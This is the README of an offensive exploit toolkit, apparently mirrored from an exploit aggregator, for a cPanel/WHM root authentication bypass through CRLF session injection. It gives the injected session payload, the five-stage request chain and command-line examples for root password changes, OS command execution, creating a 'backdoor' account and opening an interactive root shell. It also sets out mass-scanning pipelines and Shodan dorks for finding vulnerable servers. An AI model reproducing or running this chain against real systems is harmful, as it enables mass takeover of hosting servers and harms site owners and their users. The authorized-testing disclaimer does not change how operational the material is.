Share
## https://sploitus.com/exploit?id=81E394B0-D826-571A-BAFD-EA6DCF409748
# CPANEL CVE EXPLOIT
**English** | **[ŲØ§ØąØģÛ (Persian)](README.fa.md)**
```
ââââââââââââââ ââââââ ââââ ââââââââââââââ
âââââââââââââââââââââââââââââ ââââââââââââââ
âââ ââââââââââââââââââââââ âââââââââ âââ
âââ âââââââ ââââââââââââââââââââââââ âââ
âââââââââââ âââ ââââââ ââââââââââââââââââââââ
ââââââââââ âââ ââââââ âââââââââââââââââââââ
ââââââââââ âââââââââââ
âââââââââââ âââââââââââ
âââ âââ âââââââââ
âââ ââââ ââââââââââ
ââââââââ âââââââ ââââââââ
âââââââ âââââ ââââââââ
âââââââââââ ââââââââââ âââ âââââââ ââââââââââââ
âââââââââââââââââââââââââââ âââââââââââââââââââââ
ââââââ ââââââ âââââââââââ âââ ââââââ âââ
ââââââ ââââââ âââââââ âââ âââ ââââââ âââ
ââââââââââââ ââââââ ââââââââââââââââââââ âââ
âââââââââââ ââââââ ââââââââ âââââââ âââ âââ
```
[](https://www.python.org/)
[](https://nvd.nist.gov/)
[](https://www.first.org/cvss/)
[](LICENSE)
[](requirements.txt)
**Automated scanner & post-exploitation toolkit for CVE-2026-41940 â cPanel & WHM root authentication bypass via session-file CRLF injection.**
---
## Table of Contents
- [Overview](#overview)
- [CVE Details](#cve-details)
- [How It Works](#how-it-works)
- [Features](#features)
- [Affected Versions](#affected-versions)
- [Requirements](#requirements)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Post-Exploit Actions](#post-exploit-actions)
- [Interactive WHM Shell](#interactive-whm-shell)
- [Mass Scanning & Pipeline Integration](#mass-scanning--pipeline-integration)
- [Shodan Dorks](#shodan-dorks)
- [Output Format](#output-format)
- [Example Session](#example-session)
- [Legal Disclaimer](#legal-disclaimer)
---
## Overview
**CPANEL CVE EXPLOIT** is a single-file Python tool designed for **authorized security assessments** of cPanel & WHM servers vulnerable to **CVE-2026-41940**.
The vulnerability allows an unauthenticated remote attacker to poison WHM session files through CRLF injection in the `Authorization: Basic` header, bypassing authentication and gaining **root-level WHM access** without valid credentials.
| Property | Value |
|----------|-------|
| **CVE** | CVE-2026-41940 |
| **Severity** | Critical |
| **CVSS** | 10.0 |
| **Attack Vector** | Network / Unauthenticated |
| **Impact** | Full WHM root access |
| **Default Port** | `2087` (WHM) |
| **Status** | In-the-wild exploitation confirmed (Apr 2026) |
---
## CVE Details
### Root Cause
In vulnerable versions of cPanel & WHM, `saveSession()` in `Session.pm` calls `filter_sessiondata()` **after** writing the session file to disk. An attacker can inject CRLF (`\r\n`) characters through the HTTP `Authorization: Basic` header, which gets written directly into the on-disk session file â bypassing sanitization.
### Injected Session Fields
The tool uses a Base64-encoded payload that decodes to:
```
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
```
These fields simulate a fully authenticated root WHM session, including 2FA bypass (`tfa_verified=1`) and root privilege flag (`hasroot=1`).
### Fix
cPanel moved `filter_sessiondata()` to execute **before** the session write operation in `Session.pm`.
---
## How It Works
The exploit chain consists of **5 stages** (Stage 0â4):
```mermaid
flowchart TD
A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
B --> C[Stage 2: CRLF Injection via Authorization Header]
C --> D[Stage 3: Session Propagation via do_token_denied]
D --> E[Stage 4: Verify Root Access via json-api/version]
E --> F{Vulnerable?}
F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
F -->|No| H[Skip Target]
A -.- A1["GET /openid_connect/cpanelid â 307 redirect reveals real hostname"]
B -.- B1["POST /login/?login_only=1 â whostmgrsession cookie"]
C -.- C1["GET / + poisoned Basic auth â /cpsessXXXXXXXXXX token"]
D -.- D1["GET /scripts2/listaccts â flush raw session to cache"]
E -.- E1["GET /cpsessXXX/json-api/version â HTTP 200 + version JSON"]
```
| Stage | Endpoint | Purpose |
|-------|----------|---------|
| **0** | `/openid_connect/cpanelid` | Auto-discover canonical hostname via 307 redirect |
| **1** | `/login/?login_only=1` | Obtain preauth `whostmgrsession` cookie with wrong credentials |
| **2** | `/` | Inject CRLF-poisoned `Authorization: Basic` header into session file |
| **3** | `/scripts2/listaccts` | Trigger `do_token_denied` gadget to flush session to cache |
| **4** | `/{token}/json-api/version` | Confirm root access â HTTP 200 with version JSON |
---
## Features
| Feature | Description |
|---------|-------------|
| **Single-target scan** | Full exploit chain against one WHM URL |
| **Mass scanning** | Multi-threaded scanning from file or stdin |
| **Version detection** | Automatic patched/vulnerable version comparison |
| **Post-exploit API** | Password change, command exec, account listing, user creation |
| **Interactive shell** | Built-in WHM root shell with file read & API commands |
| **Selenium login** | Auto-inject session cookie into Chrome/Firefox |
| **Manual browser fallback** | Console JavaScript snippets for manual WHM login |
| **RCE check** | Quick `id` / `uname -a` verification after bypass |
| **JSON export** | Save all findings to structured JSON report |
| **Pipeline-ready** | Works with `httpx`, `subfinder`, `shodan`, and `awk` pipelines |
| **Stdlib only** | No pip dependencies required for core functionality |
| **Colorized output** | Real-time stage logging with severity indicators |
---
## Affected Versions
| Branch | Patched At | Status |
|--------|-----------|--------|
| 11.110.x | `11.110.0.97` | Vulnerable below patch |
| 11.118.x | `11.118.0.63` | Vulnerable below patch |
| 11.126.x | `11.126.0.54` | Vulnerable below patch |
| 11.132.x | `11.132.0.29` | Vulnerable below patch |
| 11.134.x | `11.134.0.20` | Vulnerable below patch |
| 11.136.x | `11.136.0.5` | Vulnerable below patch |
> **Note:** Targets running patched builds are automatically flagged and skipped during scanning.
---
## Requirements
### Core (required)
- **Python 3.8+**
- No external packages â uses Python standard library only
### Optional
| Package | Purpose |
|---------|---------|
| `selenium` | Browser auto-login (`--selenium`) |
| Chrome / Firefox | Browser engine for Selenium |
```bash
pip install -r requirements.txt # optional â selenium only
```
---
## Installation
```bash
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit
```
No build step required. Run directly:
```bash
python3 test-cve.py --help
```
---
## Quick Start
```bash
# Scan a single WHM target
python3 test-cve.py -u https://target.com:2087
# Scan with post-exploit: list all cPanel accounts
python3 test-cve.py -u https://target.com:2087 --action list
# Mass scan from file, 20 threads, save JSON report
python3 test-cve.py -l targets.txt -t 20 -o results.json
```
---
## Usage
```
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
[--action {list,passwd,cmd,exec,info,version,shell,adduser}]
[--passwd PASSWD] [--cmd CMD]
[--new-user NEW_USER] [--new-domain NEW_DOMAIN]
[--read-file READ_FILE] [--selenium]
[--engine {chrome,firefox}] [--browser] [--check-rce]
[-o OUTPUT] [--no-color]
```
### Target Options
| Flag | Description |
|------|-------------|
| `-u`, `--url` | Single target URL (e.g. `https://host:2087`) |
| `-l`, `--list` | File containing URLs, one per line |
| `--hostname` | Override canonical Host header (auto-discovered by default) |
### Scan Options
| Flag | Default | Description |
|------|---------|-------------|
| `-t`, `--threads` | `10` | Number of concurrent scan threads |
| `--timeout` | `15` | HTTP timeout in seconds |
| `--rate-limit` | `0` | Delay (seconds) between target submissions |
### Output Options
| Flag | Description |
|------|-------------|
| `-o`, `--output` | Save findings to JSON file |
| `--no-color` | Disable ANSI color output |
---
## Post-Exploit Actions
> Post-exploit flags work on **single targets only** (`-u`, not mass scan).
| Action | Flag | Description |
|--------|------|-------------|
| **Scan only** | *(default)* | Run exploit chain and report vulnerability |
| **List accounts** | `--action list` | List all cPanel accounts via WHM API |
| **Change password** | `--action passwd --passwd ` | Change root WHM password |
| **Execute command** | `--action cmd --cmd "id;whoami"` | Run OS command via WHM exec API |
| **Server info** | `--action info` | Gather hostname, load, disk, version |
| **Get version** | `--action version` | Fetch cPanel/WHM version via API |
| **Create account** | `--action adduser --new-user u --new-domain d.com --passwd p` | Create new cPanel account |
| **Interactive shell** | `--action shell` | Launch interactive WHM root shell |
| **RCE check** | `--check-rce` | Run `id;uname -a` after successful bypass |
| **Selenium login** | `--selenium [--engine chrome\|firefox]` | Auto-login to WHM dashboard in browser |
| **Manual browser** | `--browser` | Print JavaScript console commands for manual login |
### Examples
```bash
# Change root password after bypass
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'
# Execute remote command
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
# Create backdoor cPanel account
python3 test-cve.py -u https://target.com:2087 \
--action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'
# Open interactive WHM shell
python3 test-cve.py -u https://target.com:2087 --action shell
# Auto-login via Chrome
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome
# Manual browser login (prints JS for DevTools console)
python3 test-cve.py -u https://target.com:2087 --browser
```
---
## Interactive WHM Shell
Launch with `--action shell` for a full interactive session:
```
root@target.com âķ help
id / whoami / hostname / version â server info
ls [path] â file listing
cat [path] â read file contents
accounts â list cPanel accounts
addadmin â create WHM admin/reseller
passwd â change root password
exec â run OS command
exit / quit â exit shell
```
**Example:**
```
root@192.168.1.100 âķ id
uid=0(root) gid=0(root) groups=0(root)
root@192.168.1.100 âķ accounts
user=webuser1 domain=example.com email=admin@example.com
user=webuser2 domain=test.com email=info@test.com
root@192.168.1.100 âķ cat /etc/passwd
root@192.168.1.100 âķ exit
```
---
## Mass Scanning & Pipeline Integration
### From file
```bash
python3 test-cve.py -l targets.txt -t 20 -o results.json
```
### From stdin (pipe)
```bash
cat urls.txt | python3 test-cve.py
# subfinder + httpx pipeline
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30
# Shodan pipeline
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json
```
### Supported input formats
| Format | Example |
|--------|---------|
| Full URL | `https://192.168.1.1:2087` |
| IP + port | `192.168.1.1 2087` |
| Shodan output | Parsed automatically via regex |
| ANSI-colored output | Stripped automatically |
---
## Shodan Dorks
```
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM"
ssl:"cpanel" port:2087
```
---
## Output Format
Findings are saved as JSON when using `-o results.json`:
```json
{
"scanner": "cPanelSniper v2.0",
"cve": "CVE-2026-41940",
"timestamp": "2026-05-23T12:00:00.000000",
"findings": [
{
"severity": "CRIT",
"title": "CVE-2026-41940 â cPanel & WHM Authentication Bypass",
"target": "https://target.com:2087",
"canonical": "server.target.com",
"session": "root:SessionName",
"token": "/cpsess1234567890",
"version": "11.126.0.50",
"api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
"evidence": "{\"version\":\"11.126.0.50\"...}",
"cve": "CVE-2026-41940",
"cvss": "10.0",
"timestamp": "2026-05-23T12:00:05.000000"
}
]
}
```
### Console summary
```
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
cPanelSniper â CVE-2026-41940 Scan Complete
Time: 12.4s · Targets: 50
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
⥠2 VULNERABLE TARGET(S)
Target : https://victim1.com:2087
Version : 11.126.0.50
Token : /cpsess1234567890
API URL : https://victim1.com:2087/cpsess1234567890/json-api/version
Evidence : {"version":"11.126.0.50"...}
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ
```
---
## Example Session
```bash
$ python3 test-cve.py -u https://target.com:2087
Configuration:
Targets : 1
Threads : 10
Timeout : 15s
Action : scan only
12:00:01 [INFO] Canonical hostname discovered: server.target.com
12:00:02 [ OK] Stage1: preauth session = root:abc123...
12:00:03 [ OK] Stage2: HTTP 307 â token=/cpsess1234567890
12:00:04 [ OK] Stage3: HTTP 401 â do_token_denied gadget fired
12:00:05 [INFO] Stage4: HTTP 200 {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 CONFIRMED â WHM root access! (v11.126.0.50 â CONFIRMED vulnerable)
12:00:05 [PWND] Token : /cpsess1234567890
12:00:05 [PWND] Session : root:abc123...
12:00:05 [PWND] Version : 11.126.0.50
12:00:05 [PWND] API URL : https://target.com:2087/cpsess1234567890/json-api/version
```
---
## Project Structure
```
cpanel-cve-exploit/
âââ test-cve.py # Main scanner & exploit tool (single file)
âââ requirements.txt # Optional: selenium
âââ README.md # English documentation
âââ README.fa.md # Persian documentation (ŲØ§ØąØģÛ)
```
---
## Legal Disclaimer
> **FOR AUTHORIZED SECURITY TESTING ONLY**
This tool is provided for **educational and authorized penetration testing purposes only**.
- Only use against systems you **own** or have **explicit written permission** to test.
- Unauthorized access to computer systems is **illegal** under laws including the CFAA (US), Computer Misuse Act (UK), and equivalent legislation worldwide.
- In-the-wild exploitation of CVE-2026-41940 has been confirmed â patch affected systems immediately.
- The authors and contributors **accept no liability** for misuse of this software.
By using this tool, you agree to use it responsibly and in compliance with all applicable laws.
---
## References
- [CVE-2026-41940](https://nvd.nist.gov/) â NVD Entry
- cPanel Security Advisory â Session.pm CRLF injection patch
- WHM default port: `2087` (HTTPS)
---
Built for security researchers · Use responsibly